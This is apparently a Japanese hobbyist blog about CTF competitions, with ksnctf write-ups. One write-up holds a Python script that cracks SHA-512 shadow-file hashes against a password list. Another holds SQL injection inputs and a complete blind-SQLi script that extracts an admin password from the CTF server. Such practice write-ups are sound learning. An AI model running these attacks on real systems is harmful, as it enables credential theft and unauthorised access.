SECCONが国際化

日本最大のCTFであるSECCONがいよいよ国際化するそうだ。従来では日本語だけであったが、12月のオンライン予選では英語が対応になり外国チームの参加が容易になる。今まで日本語オンリーであったためctftimeにはのっていなかったので、これではれてctftimeに加えられそうだ。

日本語予選は7月で、予想よりも半年ぐらい前倒しとなり、また準備不足のまま予選に参加することになりそう。目標はプログラミング、ネットワーク、バイナリの各分野でそれぞれ最低１問は解答したい。

 

たのしいバイナリの歩き方

いくつになっても知らないことを学ぶのはたのしいことだ。そのうちマルウェア解析ができるぐらいにはなりたい。

Defcon CTF 2014参加しますた

Defcon CTFは、NWな人にはあまり関係ないが、SECな人には有名なセキュリティコンテストである。CTF(Capture The Flag)は、毎週のように世界各地で催されている。Defcon CTFはそのなかで最大なCTFである。参加チームは年々増加しており、今年は１０００チームを超えた。

さて、我らへっぽこセキュリティエンジニアの集まりで初参戦した。烏合の衆な我がチームは、なんと奇跡的にも０点を回避することができた。しかも３点もとれた！（全部１点問題ですが。。。）バイナリ解析などのリバースエンジニアリング系の問題ばっかで、手も足も出ない状態でした。pcap系とweb系の問題があればもう少し点数が取れていたかもしれない。

バイナリの問題解答例のwrite-upを読んでもさっぱり意味が分からないぐらいスキルのなさを露呈した。くやしいので一昨日からバイナリの勉強を始めた。とりあえずネットで基本中の基本ぐらいの知識を身につけて、評判がよさそうな「たのしいバイナリの歩き方」を読む予定である。

ちなみに自分が解けた問題は3dtttというやつでした。ncコマンドであるサーバと３次元３目並べゲームとの対戦ゲームで、５０回勝ち越しすると勝利のやつ。時間制限などがあったからPythonで自動化できるプログラムを書いて１ポイントゲット。

ksnctf #14 John Write-Up

問題ページ

21ユーザのパスワードファイルとなっている。user99にはパスワードリストのURLがある。問題タイトルがJohnなだけにJohn the RipperみたいなことをすればFlagがとれそう。

パスワードファイルのフォーマットはよく知らなかったので調べたところ、$6$はSHA512の意味で、さらに次の$まではソルトの部分である。平文のパスワードにソルトを連結したうえハッシュ処理を行った結果が暗号化パスワードとなる。SHA512なのでハッシュ化文字列は512ビット、16進数文字列でこれを表すと、128文字のハッシュとならないといけない。しかし、問題のハッシュをみると86文字しかなく、さらに文字は英数字混じりとなっている。最初、base64でエンコードされていると疑ったが、結果的にそうではなかった。

hashlib.sha512()で総当りすれば簡単にできるとおもったがなかなかうまくいかなかった。Pythonでsha512を生成する方法を調べた結果、cryptモジュールならできそう分かる。しかし、cryptモジュールは

windowsにないのでpythonをubuntuで書いて実行した。時間かかりすぎた。

---

import hashlib,crypt,getpass,pwd

splited =  []

#shadowファイルの各行を$と:で分割した要素を一時的に保存するリスト

salt = []

#各ユーザのソルト

crptpwd = []

#各ユーザの暗号化パスワード

i = 0

#ユーザ数を数える

qtxt = open('q.txt','r')

#shadowファイルを開く

for line in  qtxt:

      i = i + 1

      splited = line.replace('$',':').split(':')

      #shadowファイルの各行を$と:の記号で分割

      salt.append(splited[3])

      #ソルトに相当する部分を抽出

      crptpwd.append(splited[4])

      #暗号化パスワードに相当する部分を抽出

for j in range(0,i):

      passlisttxt = open('passlist.txt','r')

      #パスワードリストファイルを開く

      for m in passlisttxt:

            line2 = m.split('\n')

            mycrptpwd = crypt.crypt(line2[0],"$6$"+salt[j]).split('$')

            #パスワード候補にソルトを付与してハッシングを行う

            if mycrptpwd[3] == crptpwd[j]:

                  print line2[0]

                  break

---

ksnctf #6 Login Write-Up

問題ページ

問題ページにはIDとPassの２つのフォームしかない。IDはadminと言われているので、Passを当てる問題と思われる。SQLの脆弱性を突く以下のような簡単なSQLインジェクションを試す。

ID = admin
Pass = ' OR 'A'='A

すると、PHPのページが表示された。やはりadminのパスワードが回答らしい。PHP構文がヒントというので、上から眺めるとSQLの構文があって、この構文の中の変数$idや$passに適切なSQLをはめ込めばパスワードを盗み出せるかもしれない。作戦はたったがどのようなSQLを入れればよいのかは分からない。そもそもSQLよく知らないし。困り果ててグーグル先生に”sqlインジェクション　password”をたずねたら、偶然以下のサイトをみつけた。

ブラインドSQLインジェクション

このブラインドSQLインジェクションは初耳だが、これをうまく使えばパスワードを推測できそう。かなりの試行錯誤をへて次のようなSQLをIDフォームに入れて（Passフォームは空欄）送信するとSQLインジェクションが成功した。

admin' and substr((SELECT pass FROM user WHERE id='admin'),1,1)<='Z'--

何をしているかというと、IDがadminでかつadminのパスワードの1文字目がzよりも小さいなら正（SQLインジェクション成功）を返させる。なお、アルファベット英数文字の順序はアスキーコード表を参照すること。ZをCに変えてもう一度攻撃をするとログインエラーとなる。つまり、adminのパスワードの1文字目は、D～Zの23文字のいずれである。このようにパラメータを１つずつ変えながら試せば答えにたどり着くことできる。しかし、パスワードの長さによっては途中で挫折してしまうかもしれない。なので、パスワードの長さを知りたい衝動にかられる。短ければ気合で総当りすることもできる。

色々調べたらlength関数を使えばパスワードの長さが分かるかもしえれないので、これも試行錯誤して以下のようなSQLにたどり着いた。

admin' and (SELECT length(pass) FROM user WHERE id='admin') <= 100--

ここでは、IDがadminでかつadminのパスワードが100以下なら正とする。結果としてSQLインジェクションが成功した。先ほどと同様に100を少しずつ減らしていけばパスワードの長さがわかる。長さは、あまりがんばりたくない文字数でしたので、なんとか楽したいとおもいはじめる。

まず試したのは、ローカルプロキツール"burp proxy"でした。HTTP Requestをいったん止めてPOSTのパラメータを変えながら試せば効率が上がるとおもったからである。たしかに直接フォームにSQLを入れてためすよりは速度は速いが、やはり手動にはかわらないので数回やると萎えてしまう。

やはり、プログラミングで自動化したい！

PythonによるHTTP通信のプログラミング経験はまったくないので、まずは以下のページを見てお勉強した。

urllib2 を使ってインターネット上のリソースを取得するには

格闘する3時間でやっとプログラミングが完成した。

---

import urllib

import urllib2

passwordlist = []

for i in range(1,50):

# パスワードの長さをブラインドSQLで探索

    req = {'id':"admin' and (SELECT length(pass) FROM user WHERE id='admin') = " + str(i) + "--", 'pass':''}

    params = urllib.urlencode(req)

    url = 'http://ctfq.sweetduet.info:10080/~q6/'

    request = urllib2.Request(url, params)

    response = urllib2.urlopen(request)

    data = response.read()

    if len(data) > 2000:

    # ログイン成功と失敗をresponse文の長さで判断

        print "The password has " + str(i) + " characters"

        passlen = i

        break

for j in range(1,passlen + 1):

    for x in range(33,127):

    # "!"から"~"までの文字を総当り

        req = {'id':"admin' and substr((SELECT pass FROM user WHERE id='admin')," + str(j) + ",1)='" + chr(x) + "'--", 'pass':''}

        params = urllib.urlencode(req)

        url = 'http://ctfq.sweetduet.info:10080/~q6/'

        request = urllib2.Request(url, params)

        response = urllib2.urlopen(request)

        data = response.read()        

        if len(data) > 2000:

            print chr(x),

            passwordlist.append(chr(x))

            break

        

password = "".join(passwordlist)

print ""

print "The password is " + password

---

これを実行すると、adminのパスワードの文字数およびパスワード文字列が出てくる。

プログラムの前半はパスワード文字数を割り出して、後半ではパスワードの各文字を記号・英数文字の総当り検索を行っている。攻撃成功か失敗かはHTTPレスポンスのHTMLの長さで判断している。